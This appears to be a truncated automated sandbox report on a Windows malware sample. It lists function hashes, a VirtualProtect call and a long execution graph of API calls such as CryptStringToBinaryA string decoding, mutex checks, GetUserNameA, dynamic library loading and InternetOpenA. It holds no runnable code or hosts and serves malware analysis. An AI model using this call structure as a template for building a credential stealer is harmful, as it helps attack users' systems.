                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                • Opcode ID: b196d64d0739d5fa48107ad4aa1cab78e763ae4878abfe057b0f1c80175640e7
                                                                                                                                                                                                • Instruction ID: d2f1da75615390fe64433d463b44fb5d42ad344c69f6c4c037426a39e04e464e
                                                                                                                                                                                                • Opcode Fuzzy Hash: b196d64d0739d5fa48107ad4aa1cab78e763ae4878abfe057b0f1c80175640e7
                                                                                                                                                                                                • Instruction Fuzzy Hash: C62104B190125AEFDB00CF99D984BDEFBB4BB08314F10816AE958A7241D378A944CFA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 02D225F0 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 195 2d225f0-2d22676 VirtualProtect 197 2d22678-2d2267e 195->197 198 2d2267f-2d226a0 195->198 197->198
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02D22669
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                • Opcode ID: b7c989a8b667d8e1e4fefc09719f564dbd828648cc85e390195943a4d439896c
                                                                                                                                                                                                • Instruction ID: 5dcb231683c48d7474d5fa414dbb8cf4318ae02e0d4689f33d660cd779555955
                                                                                                                                                                                                • Opcode Fuzzy Hash: b7c989a8b667d8e1e4fefc09719f564dbd828648cc85e390195943a4d439896c
                                                                                                                                                                                                • Instruction Fuzzy Hash: BE21E5B1901259AFCB00CF9AD984ADEFBB4FB08314F10812AE958A7350D374A954CFA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 02D20C28 Relevance: 5.3, Strings: 4, Instructions: 311COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: TJpq$TJpq$Tekq$xbnq
                                                                                                                                                                                                • API String ID: 0-3315297412
                                                                                                                                                                                                • Opcode ID: d099f7227d82bdf33fa40e571bba7525a78ebdcfb39d8ee8057af518605e2d96
                                                                                                                                                                                                • Instruction ID: bc9a7428019541eaacbde5e6c58ff31323e3f893f5fe0169b0d61cfda07c105c
                                                                                                                                                                                                • Opcode Fuzzy Hash: d099f7227d82bdf33fa40e571bba7525a78ebdcfb39d8ee8057af518605e2d96
                                                                                                                                                                                                • Instruction Fuzzy Hash: D4C13971A002299FDB14DF69C994B9DBBF2FF98305F1481A8E019EB365DB31AC49CB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 02D2099F Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'kq$4'kq
                                                                                                                                                                                                • API String ID: 0-4171853269
                                                                                                                                                                                                • Opcode ID: 64fb1f56cd59648f7baf6968e51988f4fda5420ecdba15b1ec73761700406a2f
                                                                                                                                                                                                • Instruction ID: 754994947108be2cb17dcdb0fe608a6f819f55cd46d8bca0d189851bc4d6d36e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 64fb1f56cd59648f7baf6968e51988f4fda5420ecdba15b1ec73761700406a2f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 47614C75E412458FDB09EF6AE56069ABBF3AFC8300B14C579D0159B378EF70990A8F60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 02D209B0 Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1631248714.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2d20000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'kq$4'kq
                                                                                                                                                                                                • API String ID: 0-4171853269
                                                                                                                                                                                                • Opcode ID: 3a63fd086f2881b6ea8bb9cf6821adc699acf89398165271d75e244e43f76ce2
                                                                                                                                                                                                • Instruction ID: 32fc3b1471630185d9bdf89c619ac9dcd25f326f2d94f5829f5511d8c13e50f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a63fd086f2881b6ea8bb9cf6821adc699acf89398165271d75e244e43f76ce2
                                                                                                                                                                                                • Instruction Fuzzy Hash: D5511B75E412458FDB09EF6AE56069ABBF3AFC8300B14C529D0159B378EF70990A8B60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:4.4%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0.7%
                                                                                                                                                                                                Signature Coverage:5%
                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                Total number of Limit Nodes:32
                                                                                                                                                                                                execution_graph 79491 416219 79515 402570 79491->79515 79499 41623d 79614 40ea8b _EH_prolog lstrlenA 79499->79614 79502 40ea8b 4 API calls 79503 416264 79502->79503 79504 40ea8b 4 API calls 79503->79504 79505 41626b 79504->79505 79618 40e9d0 79505->79618 79507 416274 79508 4162b7 OpenEventA 79507->79508 79509 4162c4 79508->79509 79510 41629d CloseHandle Sleep 79508->79510 79512 4162cc CreateEventA 79509->79512 79806 40eb3c 79510->79806 79622 4159cb _EH_prolog 79512->79622 79807 4024f9 memset 79515->79807 79517 402584 79518 4024f9 9 API calls 79517->79518 79519 402595 79518->79519 79520 4024f9 9 API calls 79519->79520 79521 4025a6 79520->79521 79522 4024f9 9 API calls 79521->79522 79523 4025b7 79522->79523 79524 4024f9 9 API calls 79523->79524 79525 4025c8 79524->79525 79526 4024f9 9 API calls 79525->79526 79527 4025d9 79526->79527 79528 4024f9 9 API calls 79527->79528 79529 4025ea 79528->79529 79530 4024f9 9 API calls 79529->79530 79531 4025fb 79530->79531 79532 4024f9 9 API calls 79531->79532 79533 40260c 79532->79533 79534 4024f9 9 API calls 79533->79534 79535 40261d 79534->79535 79536 4024f9 9 API calls 79535->79536 79537 40262e 79536->79537 79538 4024f9 9 API calls 79537->79538 79539 40263f 79538->79539 79540 4024f9 9 API calls 79539->79540 79541 402650 79540->79541 79542 4024f9 9 API calls 79541->79542 79543 402661 79542->79543 79544 4024f9 9 API calls 79543->79544 79545 402672 79544->79545 79546 4024f9 9 API calls 79545->79546 79547 402683 79546->79547 79548 4024f9 9 API calls 79547->79548 79549 402694 79548->79549 79550 4024f9 9 API calls 79549->79550 79551 4026a5 79550->79551 79552 4024f9 9 API calls 79551->79552 79553 4026b6 79552->79553 79554 4024f9 9 API calls 79553->79554 79555 4026c7 79554->79555 79556 4024f9 9 API calls 79555->79556 79557 4026d8 79556->79557 79558 4024f9 9 API calls 79557->79558 79559 4026e9 79558->79559 79560 4024f9 9 API calls 79559->79560 79561 4026fa 79560->79561 79562 4024f9 9 API calls 79561->79562 79563 40270b 79562->79563 79564 4024f9 9 API calls 79563->79564 79565 40271c 79564->79565 79566 4024f9 9 API calls 79565->79566 79567 40272d 79566->79567 79568 4024f9 9 API calls 79567->79568 79569 40273e 79568->79569 79570 4024f9 9 API calls 79569->79570 79571 40274f 79570->79571 79572 4024f9 9 API calls 79571->79572 79573 402760 79572->79573 79574 4024f9 9 API calls 79573->79574 79575 402771 79574->79575 79576 4024f9 9 API calls 79575->79576 79577 402782 79576->79577 79578 4024f9 9 API calls 79577->79578 79579 402793 79578->79579 79580 4024f9 9 API calls 79579->79580 79581 4027a4 79580->79581 79582 4024f9 9 API calls 79581->79582 79583 4027b5 79582->79583 79584 4024f9 9 API calls 79583->79584 79585 4027c6 79584->79585 79586 4024f9 9 API calls 79585->79586 79587 4027d7 79586->79587 79588 4024f9 9 API calls 79587->79588 79589 4027e8 79588->79589 79590 4024f9 9 API calls 79589->79590 79591 4027f9 79590->79591 79592 4024f9 9 API calls 79591->79592 79593 40280a 79592->79593 79594 4162f9 wcslen wcslen LoadLibraryA wcslen wcslen 79593->79594 79595 416345 wcslen wcslen 79594->79595 79596 41656b LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 79594->79596 79828 406082 79595->79828 79597 4165c9 GetProcAddress 79596->79597 79598 4165db 79596->79598 79597->79598 79600 4165e4 GetProcAddress GetProcAddress 79598->79600 79601 41660d 79598->79601 79600->79601 79603 416616 GetProcAddress 79601->79603 79604 416628 79601->79604 79602 41636c 23 API calls 79602->79596 79603->79604 79605 416631 GetProcAddress 79604->79605 79606 416643 79604->79606 79605->79606 79607 41622b 79606->79607 79608 41664c GetProcAddress GetProcAddress 79606->79608 79609 40e912 79607->79609 79608->79607 79610 40e920 79609->79610 79611 40e942 79610->79611 79612 40e938 lstrcpy 79610->79612 79613 40ebba GetProcessHeap HeapAlloc GetUserNameA 79611->79613 79612->79611 79613->79499 79616 40eacb 79614->79616 79615 40eaf0 79615->79502 79616->79615 79617 40eadd lstrcpy lstrcat 79616->79617 79617->79615 79619 40e9e6 79618->79619 79620 40ea0f 79619->79620 79621 40ea07 lstrcpy 79619->79621 79620->79507 79621->79620 79623 4159df 79622->79623 79624 40e912 lstrcpy 79623->79624 79625 4159f2 79624->79625 79829 412424 _EH_prolog 79625->79829 79627 415a02 79831 4121c3 _EH_prolog 79627->79831 79629 415a11 79833 40e986 lstrlenA 79629->79833 79632 40e986 2 API calls 79633 415a32 79632->79633 79837 402811 79633->79837 79639 415b02 79640 40e9d0 lstrcpy 79639->79640 79641 415b14 79640->79641 79642 40e912 lstrcpy 79641->79642 79643 415b33 79642->79643 79644 40ea8b 4 API calls 79643->79644 79645 415b4c 79644->79645 80427 40ea17 _EH_prolog 79645->80427 79648 40e9d0 lstrcpy 79649 415b75 79648->79649 79650 415b9c CreateDirectoryA 79649->79650 80431 4010b1 _EH_prolog 79650->80431 79658 415be5 79659 40e9d0 lstrcpy 79658->79659 79660 415bf7 79659->79660 79661 40e9d0 lstrcpy 79660->79661 79662 415c09 79661->79662 80556 40e949 79662->80556 79665 40ea8b 4 API calls 79666 415c2d 79665->79666 79667 40e9d0 lstrcpy 79666->79667 79668 415c3a 79667->79668 79669 40ea17 3 API calls 79668->79669 79670 415c59 79669->79670 79671 40e9d0 lstrcpy 79670->79671 79672 415c66 79671->79672 79673 415c81 InternetOpenA 79672->79673 80560 40eb3c 79673->80560 79675 415c9d InternetOpenA 79676 40e949 lstrcpy 79675->79676 79677 415ccd 79676->79677 80561 402101 79677->80561 79682 40e949 lstrcpy 79683 415d07 79682->79683 80583 403b17 _EH_prolog 79683->80583 79685 415d11 80719 410bf7 _EH_prolog 79685->80719 79687 415d19 79688 40e912 lstrcpy 79687->79688 79689 415d4d 79688->79689 79690 4010b1 2 API calls 79689->79690 79691 415d65 79690->79691 80739 405183 _EH_prolog 79691->80739 79693 415d6f 80920 410634 _EH_prolog 79693->80920 79695 415d77 79696 40e912 lstrcpy 79695->79696 79697 415d9f 79696->79697 79698 4010b1 2 API calls 79697->79698 79699 415db7 79698->79699 79700 405183 46 API calls 79699->79700 79701 415dc1 79700->79701 80928 4104d9 _EH_prolog 79701->80928 79703 415dc9 79704 4010b1 2 API calls 79703->79704 79705 415ddd 79704->79705 80939 41361f _EH_prolog 79705->80939 79708 40e949 lstrcpy 79709 415df6 79708->79709 79710 40e912 lstrcpy 79709->79710 79711 415e10 79710->79711 81287 4041d4 _EH_prolog 79711->81287 79713 415e19 79714 4010b1 2 API calls 79713->79714 79715 415e49 79714->79715 81306 40dd88 _EH_prolog 79715->81306 79717 415e4e 79806->79508 79812 40247e 79807->79812 79811 402558 memset 79811->79517 79824 4171f0 79812->79824 79817 40fafd 79818 4024e0 CryptStringToBinaryA 79817->79818 79819 4024f2 strcat GetProcessHeap RtlAllocateHeap 79818->79819 79820 40232a 79819->79820 79821 40233d 79820->79821 79822 4023ad ??_U@YAPAXI 79821->79822 79823 4023c8 79822->79823 79823->79811 79825 40248b memset 79824->79825 79826 40fafd 79825->79826 79827 4024c0 CryptStringToBinaryA 79826->79827 79827->79817 79828->79602 79830 41243a 79829->79830 79830->79627 79832 4121d9 79831->79832 79832->79629 79834 40e99e 79833->79834 79835 40e9c9 79834->79835 79836 40e9bf lstrcpy 79834->79836 79835->79632 79836->79835 79838 4024f9 9 API calls 79837->79838 79839 40281b 79838->79839 79840 4024f9 9 API calls 79839->79840 79841 40282c 79840->79841 79842 4024f9 9 API calls 79841->79842 79843 40283d 79842->79843 79844 4024f9 9 API calls 79843->79844 79845 40284e 79844->79845 79846 4024f9 9 API calls 79845->79846 79847 40285f 79846->79847 79848 4024f9 9 API calls 79847->79848 79849 402870 79848->79849 79850 4024f9 9 API calls 79849->79850 79851 402881 79850->79851 79852 4024f9 9 API calls 79851->79852 79853 402892 79852->79853 79854 4024f9 9 API calls 79853->79854 79855 4028a3 79854->79855 79856 4024f9 9 API calls 79855->79856 79857 4028b4 79856->79857 79858 4024f9 9 API calls 79857->79858 79859 4028c5 79858->79859 79860 4024f9 9 API calls 79859->79860 79861 4028d6 79860->79861 79862 4024f9 9 API calls 79861->79862 79863 4028e7 79862->79863 79864 4024f9 9 API calls 79863->79864 79865 4028f8 79864->79865 79866 4024f9 9 API calls 79865->79866 79867 402909 79866->79867 79868 4024f9 9 API calls 79867->79868 79869 40291a 79868->79869 79870 4024f9 9 API calls 79869->79870 79871 40292b 79870->79871 79872 4024f9 9 API calls 79871->79872 79873 40293c 79872->79873 79874 4024f9 9 API calls 79873->79874 79875 40294d 79874->79875 79876 4024f9 9 API calls 79875->79876 79877 40295e 79876->79877 79878 4024f9 9 API calls 79877->79878 79879 40296f 79878->79879 79880 4024f9 9 API calls 79879->79880 79881 402980 79880->79881 79882 4024f9 9 API calls 79881->79882 79883 402991 79882->79883 79884 4024f9 9 API calls 79883->79884 79885 4029a2 79884->79885 79886 4024f9 9 API calls 79885->79886 79887 4029b3 79886->79887 79888 4024f9 9 API calls 79887->79888 79889 4029c4 79888->79889 79890 4024f9 9 API calls 79889->79890 79891 4029d5 79890->79891 79892 4024f9 9 API calls 79891->79892 79893 4029e6 79892->79893 79894 4024f9 9 API calls 79893->79894 79895 4029f7 79894->79895 79896 4024f9 9 API calls 79895->79896 79897 402a08 79896->79897 79898 4024f9 9 API calls 79897->79898 79899 402a19 79898->79899 79900 4024f9 9 API calls 79899->79900 79901 402a2a 79900->79901 79902 4024f9 9 API calls 79901->79902 79903 402a3b 79902->79903 79904 4024f9 9 API calls 79903->79904 79905 402a4c 79904->79905 79906 4024f9 9 API calls 79905->79906 79907 402a5d 79906->79907 79908 4024f9 9 API calls 79907->79908 79909 402a6e 79908->79909 79910 4024f9 9 API calls 79909->79910 79911 402a7f 79910->79911 79912 4024f9 9 API calls 79911->79912 79913 402a90 79912->79913 79914 4024f9 9 API calls 79913->79914 79915 402aa1 79914->79915 79916 4024f9 9 API calls 79915->79916 79917 402ab2 79916->79917 79918 4024f9 9 API calls 79917->79918 79919 402ac3 79918->79919 79920 4024f9 9 API calls 79919->79920 79921 402ad4 79920->79921 79922 4024f9 9 API calls 79921->79922 79923 402ae5 79922->79923 79924 4024f9 9 API calls 79923->79924 79925 402af6 79924->79925 79926 4024f9 9 API calls 79925->79926 79927 402b07 79926->79927 79928 4024f9 9 API calls 79927->79928 79929 402b18 79928->79929 79930 4024f9 9 API calls 79929->79930 79931 402b29 79930->79931 79932 4024f9 9 API calls 79931->79932 79933 402b3a 79932->79933 79934 4024f9 9 API calls 79933->79934 79935 402b4b 79934->79935 79936 4024f9 9 API calls 79935->79936 79937 402b5c 79936->79937 79938 4024f9 9 API calls 79937->79938 79939 402b6d 79938->79939 79940 4024f9 9 API calls 79939->79940 79941 402b7e 79940->79941 79942 4024f9 9 API calls 79941->79942 79943 402b8f 79942->79943 79944 4024f9 9 API calls 79943->79944 79945 402ba0 79944->79945 79946 4024f9 9 API calls 79945->79946 79947 402bb1 79946->79947 79948 4024f9 9 API calls 79947->79948 79949 402bc2 79948->79949 79950 4024f9 9 API calls 79949->79950 79951 402bd3 79950->79951 79952 4024f9 9 API calls 79951->79952 79953 402be4 79952->79953 79954 4024f9 9 API calls 79953->79954 79955 402bf5 79954->79955 79956 4024f9 9 API calls 79955->79956 79957 402c06 79956->79957 79958 4024f9 9 API calls 79957->79958 79959 402c17 79958->79959 79960 4024f9 9 API calls 79959->79960 79961 402c28 79960->79961 79962 4024f9 9 API calls 79961->79962 79963 402c39 79962->79963 79964 4024f9 9 API calls 79963->79964 79965 402c4a 79964->79965 79966 4024f9 9 API calls 79965->79966 79967 402c5b 79966->79967 79968 4024f9 9 API calls 79967->79968 79969 402c6c 79968->79969 79970 4024f9 9 API calls 79969->79970 79971 402c7d 79970->79971 79972 4024f9 9 API calls 79971->79972 79973 402c8e 79972->79973 79974 4024f9 9 API calls 79973->79974 79975 402c9f 79974->79975 79976 4024f9 9 API calls 79975->79976 79977 402cb0 79976->79977 79978 4024f9 9 API calls 79977->79978 79979 402cc1 79978->79979 79980 4024f9 9 API calls 79979->79980 79981 402cd2 79980->79981 79982 4024f9 9 API calls 79981->79982 79983 402ce3 79982->79983 79984 4024f9 9 API calls 79983->79984 79985 402cf4 79984->79985 79986 4024f9 9 API calls 79985->79986 79987 402d05 79986->79987 79988 4024f9 9 API calls 79987->79988 79989 402d16 79988->79989 79990 4024f9 9 API calls 79989->79990 79991 402d27 79990->79991 79992 4024f9 9 API calls 79991->79992 79993 402d38 79992->79993 79994 4024f9 9 API calls 79993->79994 79995 402d49 79994->79995 79996 4024f9 9 API calls 79995->79996 79997 402d5a 79996->79997 79998 4024f9 9 API calls 79997->79998 79999 402d6b 79998->79999 80000 4024f9 9 API calls 79999->80000 80001 402d7c 80000->80001 80002 4024f9 9 API calls 80001->80002 80003 402d8d 80002->80003 80004 4024f9 9 API calls 80003->80004 80005 402d9e 80004->80005 80006 4024f9 9 API calls 80005->80006 80007 402daf 80006->80007 80008 4024f9 9 API calls 80007->80008 80009 402dc0 80008->80009 80010 4024f9 9 API calls 80009->80010 80011 402dd1 80010->80011 80012 4024f9 9 API calls 80011->80012 80013 402de2 80012->80013 80014 4024f9 9 API calls 80013->80014 80015 402df3 80014->80015 80016 4024f9 9 API calls 80015->80016 80017 402e04 80016->80017 80018 4024f9 9 API calls 80017->80018 80019 402e15 80018->80019 80020 4024f9 9 API calls 80019->80020 80021 402e26 80020->80021 80022 4024f9 9 API calls 80021->80022 80023 402e37 80022->80023 80024 4024f9 9 API calls 80023->80024 80025 402e48 80024->80025 80026 4024f9 9 API calls 80025->80026 80027 402e59 80026->80027 80028 4024f9 9 API calls 80027->80028 80029 402e6a 80028->80029 80030 4024f9 9 API calls 80029->80030 80031 402e7b 80030->80031 80032 4024f9 9 API calls 80031->80032 80033 402e8c 80032->80033 80034 4024f9 9 API calls 80033->80034 80035 402e9d 80034->80035 80036 4024f9 9 API calls 80035->80036 80037 402eae 80036->80037 80038 4024f9 9 API calls 80037->80038 80039 402ebf 80038->80039 80040 4024f9 9 API calls 80039->80040 80041 402ed0 80040->80041 80042 4024f9 9 API calls 80041->80042 80043 402ee1 80042->80043 80044 4024f9 9 API calls 80043->80044 80045 402ef2 80044->80045 80046 4024f9 9 API calls 80045->80046 80047 402f03 80046->80047 80048 4024f9 9 API calls 80047->80048 80049 402f14 80048->80049 80050 4024f9 9 API calls 80049->80050 80051 402f25 80050->80051 80052 4024f9 9 API calls 80051->80052 80053 402f36 80052->80053 80054 4024f9 9 API calls 80053->80054 80055 402f47 80054->80055 80056 4024f9 9 API calls 80055->80056 80057 402f58 80056->80057 80058 4024f9 9 API calls 80057->80058 80059 402f69 80058->80059 80060 4024f9 9 API calls 80059->80060 80061 402f7a 80060->80061 80062 4024f9 9 API calls 80061->80062 80063 402f8b 80062->80063 80064 4024f9 9 API calls 80063->80064 80065 402f9c 80064->80065 80066 4024f9 9 API calls 80065->80066 80067 402fad 80066->80067 80068 4024f9 9 API calls 80067->80068 80069 402fbe 80068->80069 80070 4024f9 9 API calls 80069->80070 80071 402fcf 80070->80071 80072 4024f9 9 API calls 80071->80072 80073 402fe0 80072->80073 80074 4024f9 9 API calls 80073->80074 80075 402ff1 80074->80075 80076 4024f9 9 API calls 80075->80076 80077 403002 80076->80077 80078 4024f9 9 API calls 80077->80078 80079 403013 80078->80079 80080 4024f9 9 API calls 80079->80080 80081 403024 80080->80081 80082 4024f9 9 API calls 80081->80082 80083 403035 80082->80083 80084 4024f9 9 API calls 80083->80084 80085 403046 80084->80085 80086 4024f9 9 API calls 80085->80086 80087 403057 80086->80087 80088 4024f9 9 API calls 80087->80088 80089 403068 80088->80089 80090 4024f9 9 API calls 80089->80090 80091 403079 80090->80091 80092 4024f9 9 API calls 80091->80092 80093 40308a 80092->80093 80094 4024f9 9 API calls 80093->80094 80095 40309b 80094->80095 80096 4024f9 9 API calls 80095->80096 80097 4030ac 80096->80097 80098 4024f9 9 API calls 80097->80098 80099 4030bd 80098->80099 80100 4024f9 9 API calls 80099->80100 80101 4030ce 80100->80101 80102 4024f9 9 API calls 80101->80102 80103 4030df 80102->80103 80104 4024f9 9 API calls 80103->80104 80105 4030f0 80104->80105 80106 4024f9 9 API calls 80105->80106 80107 403101 80106->80107 80108 4024f9 9 API calls 80107->80108 80109 403112 80108->80109 80110 4024f9 9 API calls 80109->80110 80111 403123 80110->80111 80112 4024f9 9 API calls 80111->80112 80113 403134 80112->80113 80114 4024f9 9 API calls 80113->80114 80115 403145 80114->80115 80116 4024f9 9 API calls 80115->80116 80117 403156 80116->80117 80118 4024f9 9 API calls 80117->80118 80119 403167 80118->80119 80120 4024f9 9 API calls 80119->80120 80121 403178 80120->80121 80122 4024f9 9 API calls 80121->80122 80123 403189 80122->80123 80124 4024f9 9 API calls 80123->80124 80125 40319a 80124->80125 80126 4024f9 9 API calls 80125->80126 80127 4031ab 80126->80127 80128 4024f9 9 API calls 80127->80128 80129 4031bc 80128->80129 80130 4024f9 9 API calls 80129->80130 80131 4031cd 80130->80131 80132 4024f9 9 API calls 80131->80132 80133 4031de 80132->80133 80134 4024f9 9 API calls 80133->80134 80135 4031ef 80134->80135 80136 4024f9 9 API calls 80135->80136 80137 403200 80136->80137 80138 4024f9 9 API calls 80137->80138 80139 403211 80138->80139 80140 4024f9 9 API calls 80139->80140 80141 403222 80140->80141 80142 4024f9 9 API calls 80141->80142 80143 403233 80142->80143 80144 4024f9 9 API calls 80143->80144 80145 403244 80144->80145 80146 4024f9 9 API calls 80145->80146 80147 403255 80146->80147 80148 4024f9 9 API calls 80147->80148 80149 403266 80148->80149 80150 4024f9 9 API calls 80149->80150 80151 403277 80150->80151 80152 4024f9 9 API calls 80151->80152 80153 403288 80152->80153 80154 4024f9 9 API calls 80153->80154 80155 403299 80154->80155 80156 4024f9 9 API calls 80155->80156 80157 4032aa 80156->80157 80158 4024f9 9 API calls 80157->80158 80159 4032bb 80158->80159 80160 4024f9 9 API calls 80159->80160 80161 4032cc 80160->80161 80162 4024f9 9 API calls 80161->80162 80163 4032dd 80162->80163 80164 4024f9 9 API calls 80163->80164 80165 4032ee 80164->80165 80166 4024f9 9 API calls 80165->80166 80167 4032ff 80166->80167 80168 4024f9 9 API calls 80167->80168 80169 403310 80168->80169 80170 4024f9 9 API calls 80169->80170 80171 403321 80170->80171 80172 4024f9 9 API calls 80171->80172 80173 403332 80172->80173 80174 4024f9 9 API calls 80173->80174 80175 403343 80174->80175 80176 4024f9 9 API calls 80175->80176 80177 403354 80176->80177 80178 4024f9 9 API calls 80177->80178 80179 403365 80178->80179 80180 4024f9 9 API calls 80179->80180 80181 403376 80180->80181 80182 4024f9 9 API calls 80181->80182 80183 403387 80182->80183 80184 4024f9 9 API calls 80183->80184 80185 403398 80184->80185 80186 4024f9 9 API calls 80185->80186 80187 4033a9 80186->80187 80188 4024f9 9 API calls 80187->80188 80189 4033ba 80188->80189 80190 4024f9 9 API calls 80189->80190 80191 4033cb 80190->80191 80192 4024f9 9 API calls 80191->80192 80193 4033dc 80192->80193 80194 4024f9 9 API calls 80193->80194 80195 4033ed 80194->80195 80196 4024f9 9 API calls 80195->80196 80197 4033fe 80196->80197 80198 4024f9 9 API calls 80197->80198 80199 40340f 80198->80199 80200 4024f9 9 API calls 80199->80200 80201 403420 80200->80201 80202 4024f9 9 API calls 80201->80202 80203 403431 80202->80203 80204 4024f9 9 API calls 80203->80204 80205 403442 80204->80205 80206 4024f9 9 API calls 80205->80206 80207 403453 80206->80207 80208 4024f9 9 API calls 80207->80208 80209 403464 80208->80209 80210 4024f9 9 API calls 80209->80210 80211 403475 80210->80211 80212 4024f9 9 API calls 80211->80212 80213 403486 80212->80213 80214 4024f9 9 API calls 80213->80214 80215 403497 80214->80215 80216 4024f9 9 API calls 80215->80216 80217 4034a8 80216->80217 80218 4024f9 9 API calls 80217->80218 80219 4034b9 80218->80219 80220 4024f9 9 API calls 80219->80220 80221 4034ca 80220->80221 80222 4024f9 9 API calls 80221->80222 80223 4034db 80222->80223 80224 4024f9 9 API calls 80223->80224 80225 4034ec 80224->80225 80226 4024f9 9 API calls 80225->80226 80227 4034fd 80226->80227 80228 4024f9 9 API calls 80227->80228 80229 40350e 80228->80229 80230 4024f9 9 API calls 80229->80230 80231 40351f 80230->80231 80232 4024f9 9 API calls 80231->80232 80233 403530 80232->80233 80234 4024f9 9 API calls 80233->80234 80235 403541 80234->80235 80236 4024f9 9 API calls 80235->80236 80237 403552 80236->80237 80238 4024f9 9 API calls 80237->80238 80239 403563 80238->80239 80240 4024f9 9 API calls 80239->80240 80241 403574 80240->80241 80242 4024f9 9 API calls 80241->80242 80243 403585 80242->80243 80244 4024f9 9 API calls 80243->80244 80245 403596 80244->80245 80246 4024f9 9 API calls 80245->80246 80247 4035a7 80246->80247 80248 4024f9 9 API calls 80247->80248 80249 4035b8 80248->80249 80250 4024f9 9 API calls 80249->80250 80251 4035c9 80250->80251 80252 4024f9 9 API calls 80251->80252 80253 4035da 80252->80253 80254 4024f9 9 API calls 80253->80254 80255 4035eb 80254->80255 80256 4024f9 9 API calls 80255->80256 80257 4035fc 80256->80257 80258 4024f9 9 API calls 80257->80258 80259 40360d 80258->80259 80260 4024f9 9 API calls 80259->80260 80261 40361e 80260->80261 80262 4024f9 9 API calls 80261->80262 80263 40362f 80262->80263 80264 4024f9 9 API calls 80263->80264 80265 403640 80264->80265 80266 4024f9 9 API calls 80265->80266 80267 403651 80266->80267 80268 4024f9 9 API calls 80267->80268 80269 403662 80268->80269 80270 4024f9 9 API calls 80269->80270 80271 403673 80270->80271 80272 4024f9 9 API calls 80271->80272 80273 403684 80272->80273 80274 4024f9 9 API calls 80273->80274 80275 403695 80274->80275 80276 4024f9 9 API calls 80275->80276 80277 4036a6 80276->80277 80278 4024f9 9 API calls 80277->80278 80279 4036b7 80278->80279 80280 4024f9 9 API calls 80279->80280 80281 4036c8 80280->80281 80282 4024f9 9 API calls 80281->80282 80283 4036d9 80282->80283 80284 4024f9 9 API calls 80283->80284 80285 4036ea 80284->80285 80286 4024f9 9 API calls 80285->80286 80287 4036fb 80286->80287 80288 4024f9 9 API calls 80287->80288 80289 40370c 80288->80289 80290 4024f9 9 API calls 80289->80290 80291 40371d 80290->80291 80292 4024f9 9 API calls 80291->80292 80293 40372e 80292->80293 80294 4024f9 9 API calls 80293->80294 80295 40373f 80294->80295 80296 4024f9 9 API calls 80295->80296 80297 403750 80296->80297 80298 4024f9 9 API calls 80297->80298 80299 403761 80298->80299 80300 4024f9 9 API calls 80299->80300 80301 403772 80300->80301 80302 